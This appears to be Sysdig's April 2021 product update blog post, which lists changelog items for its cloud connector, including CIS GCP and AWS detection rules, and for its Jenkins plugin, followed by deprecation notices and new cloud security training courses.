v0.1.0 is still the latest release.

Sysdig Cloud Connector

v0.6.4 was released. Below is a diff of updates since v0.5.1, which we covered last month:

  • When the loader finds a duplicated rule/macro/list, override it.
  • Allow rules exceptions when validating.
  • Added CIS GCP Foundation Benchmark rules for Virtual Machines.
  • Added CIS GCP Foundation Benchmark rules for Networks and DNS.
  • Added CIS GCP Foundation Benchmark rules for LOGGING (sinks).
  • Enable Secure integrations by default.
  • Enable sending the header with the account ID to Secure.
  • Added CIS GCP Foundation Benchmark rules for IAM and APIKEYS.
  • Use aws.* fields instead of plain jevt on rules.
  • Added “@type“-like compatibility to jsonpath in rule files.
  • Breaking change: Add support for the ‘@’ character in jevt.event rules (the Falco OSS implementation currently does not support this, but we need it for GCP accounts).
  • When segment key is not specified, return an error.
  • GCP Rules for: Describe Instance, Super Admin Executing command.
  • GCP Rules for: Buckets.
  • Add gcp.user and gcp.callerIp to GCP events scope.
  • Add gcp.location to GCP events scope.
  • Add default notifiers (metrics, console, and tracking) to cloud-scanning.
  • Allow query scopes using the event getField.
  • Show rule name alongside policy name on Secure Event Feed.
  • Do not exit when loading rules on incorrect order, but log it.
  • Filter out unneeded logs on auditlog.
  • Integrate with Secure Account Registration.
  • Add pagination to the gcp logging reader.
  • Add policy_id to the event in secure.
  • Notifiers set the event timestamp to the event occurrence date instead of alert creation.
  • rules-validator: Only print error info on error.
  • Update AWS SDK to v2.
  • Use the same args/output as OSS Falco in the rules validator.
  • rules-validator: Allow empty files.
  • Filter events on the pipeline according to the Secure settings.
  • Add GCP Stackdriver notifier.
  • Allow specifying the log level.
  • New ECS Exec rules.
  • Display the Falco rule name in the event for Sysdig Secure, in addition to policy.
  • Ignore non-aws_cloudtrail rules when validating.
  • Include build and version info.
  • rules-validator: Fix output message while reading rules file.

See also: Sysdig Cloud Connector documentation.

Sysdig Secure inline scan for Github Actions

v3 is still the latest version.

Sysdig Secure Jenkins plugin

v2.1.7 was released. Below is a diff of updates since v2.1.4, which we covered last month:

  • Support some edge cases where the digest in the report doesn’t match the local digest and makes the execution fail.
  • Error with Dockerfile when the Docker daemon is running in a different host instead of in the agent.
  • Improve environment variable handling for inline-scan.

See more: Sysdig Secure Jenkins plugin homepage.

Deprecation Notices

Legacy commands audit & legacy policy events

  • The “Commands Audit” feature was deprecated in favor of Activity Audit in Nov. 2019. This feature will be completely removed from the SaaS product in April 2021.
  • Sysdig agent version 0.93+*, released in Nov. 2019, is required by the Activity Audit feature.
  • The “Policy Events” feature was deprecated in favor of the new Events feed in June 2020. This feature will be completely removed from the SaaS product in April 2021.

* Sysdig agent version 10.3.0+ is recommended.

Training & education

We released several new training courses related to cloud security this month. You can find them in our training portal, and they cover the following topics:

  • Amazon ECR Image Registry Scanning.
  • Amazon ECS & Fargate Image Scanning.
  • Cloud Security Posture Management and Compliance.
  • Threat Detection based on CloudTrail.
  • Deploying Sysdig Cloud Security for AWS.
  • Sysdig Cloud Security on AWS Workshop (which covers several of the above areas).

We’ve also released a couple of labs on image vulnerability scanning:

New website resources

Blogs

Webinars

Other resources

The post What’s new in Sysdig – April 2021 appeared first on Sysdig.
